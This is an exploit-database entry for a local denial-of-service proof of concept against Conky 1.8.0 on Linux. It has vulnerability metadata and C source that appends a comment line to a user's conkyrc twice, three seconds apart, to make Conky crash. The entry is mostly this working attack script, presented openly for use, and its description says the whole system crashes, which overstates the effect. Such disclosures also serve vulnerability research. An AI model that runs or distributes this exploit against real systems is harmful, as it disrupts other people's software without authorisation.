Conky 1.8.0 on Linux Local DoS/PoC Exploit

vendor:

Conky

by:

Arturo D'Elia

7,5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: Conky

Affected Version From: 1.8.0

Affected Version To: 1.8.0

Patch Exists: NO

Related CWE: N/A

CPE: a:conky:conky

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2010

Conky 1.8.0 on Linux Local DoS/PoC Exploit

This exploit is for Conky 1.8.0 on Linux. It was discovered by Arturo D'Elia on 12 Dec 2010. The exploit is a local DoS/PoC exploit which sends a DoS/PoC string to the conky configuration file. This causes the system to crash.

Mitigation:

No fix is available for this vulnerability.

Source

Exploit-DB raw data:

/*                                                      */
/*  Vulnerability Conky 1.8.0 on Linux                  */
/*   Tested on: Linux with kernel 2.6.32.1-smp          */
/*       Found: by Arturo D'Elia                        */
/*  Date found: 12 Dec 2010                             */
/*         Fix: No Fix                                  */
/*    Contacts: arturo.delia@libero.it                  */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char killyou[]=  "# w000wwwww i exploit it and i kill you!";

int main( int argc, char **argv){

    FILE *fp;

    /*  Write the information program*/
    printf("\n[*] Conky 1.8.0 Local DoS/PoC Exploit [*]\n");
    printf("[*]       Coded by: Arturo D'Elia\n");
    printf("[*]      Tested on: Linux\n");
    printf("[*] Kernel version: 2.6.32.1-smp\n");
    printf("[*]      Bug Found: 12 Dec 2010\n");
    printf("[*]       Contacts: arturo.delia@libero.it\n\n");

    /*  Check the input parameter   */
    if(argc!=2)
        exit(fprintf(stderr,"Usage: %s < path conkyrc >\n",argv[0]));

    /*  Check file exsist           */
    printf("[>] Open conky configuration\n");
    if((fp=fopen(argv[1],"r"))==NULL)
        exit(fprintf(stderr,"[x] Cannot open %s file\n",argv[1]));
    fclose(fp);

    /*  Open file for append and i send it the  */
    /*  exploited strings                       */
    fp=fopen(argv[1],"a");
    printf("[>] Send the DoS/PoC string\n");
    fprintf(fp,"%s\n",killyou);
    fclose(fp);

    /*  Wait 3 seconds              */
    usleep(3000000);

    /*  Resend exploited strings    */
    fp=fopen(argv[1],"a");
    fprintf(fp,"%s\n",killyou);
    fclose(fp);

    /*  Ok guy.                     */
    printf("[*] Ok guy, you kill it.\n\n");
return 0;
}